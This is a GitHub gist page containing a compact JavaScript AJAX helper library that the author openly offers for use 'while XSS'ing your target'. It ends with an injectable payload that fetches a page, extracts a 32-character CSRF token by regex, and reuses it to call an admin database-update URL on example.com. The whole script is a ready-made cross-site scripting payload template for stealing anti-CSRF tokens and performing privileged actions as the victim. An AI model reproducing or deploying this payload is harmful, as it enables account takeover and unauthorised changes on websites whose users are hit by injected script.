Skip to content

Instantly share code, notes, and snippets.

@nmcv
Created February 5, 2013 09:48
Show Gist options
  • Save nmcv/4713391 to your computer and use it in GitHub Desktop.
Save nmcv/4713391 to your computer and use it in GitHub Desktop.
AJAX routines stub - a bunch of JS which helps do something via AJAX (like posting a form, fetching URL into a buffer, etc.) while XSS'ing your target. No need to tote full jQuery or sort of if you need just the basic AJAX routines.
<script>
function $(e) {
if(typeof e == 'string') e = document.getElementById(e);
return e
};
function collect(a, f) {
var n = [];
for(var i = 0; i < a.length; i++) {
var v = f(a[i]);
if(v != null) n.push(v)
}
return n
};
ajax = {};
ajax.x = function() {
try {
return new ActiveXObject('Msxml2.XMLHTTP')
} catch(e) {
try {
return new ActiveXObject('Microsoft.XMLHTTP')
} catch(e) {
return new XMLHttpRequest()
}
}
};
ajax.serialize = function(f) {
var g = function(n) {
return f.getElementsByTagName(n)
};
var nv = function(e) {
if(e.name) return encodeURIComponent(e.name) + '=' + encodeURIComponent(e.value);
else return ''
};
var i = collect(g('input'), function(i) {
if((i.type != 'radio' && i.type != 'checkbox') || i.checked) return nv(i)
});
var s = collect(g('select'), nv);
var t = collect(g('textarea'), nv);
return i.concat(s).concat(t).join('&');
};
ajax.send = function(u, f, m, a) {
var x = ajax.x();
x.open(m, u, true);
x.onreadystatechange = function() {
if(x.readyState == 4) f(x.responseText)
};
if(m == 'POST') x.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
x.send(a)
};
ajax.get = function(url, func) {
ajax.send(url, func, 'GET')
};
ajax.gets = function(url) {
var x = ajax.x();
x.open('GET', url, false);
x.send(null);
return x.responseText
};
ajax.post = function(url, func, args) {
ajax.send(url, func, 'POST', args)
};
ajax.update = function(url, elm) {
var e = $(elm);
var f = function(r) {
e.innerHTML = r
};
ajax.get(url, f)
};
ajax.submit = function(url, elm, frm) {
var e = $(elm);
var f = function(r) {
e.innerHTML = r
};
ajax.post(url, f, ajax.serialize(frm))
};
// Payload
ajax.get('http://example.com/secret_page.php', function(buf) {
csrf = buf.match(/[a-f0-9]{32}/);
ajax.get("http://example.com/update_database.php?user=admin&csrftoken=" + csrf,
function(buf2) { console.log(buf2) });
});
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment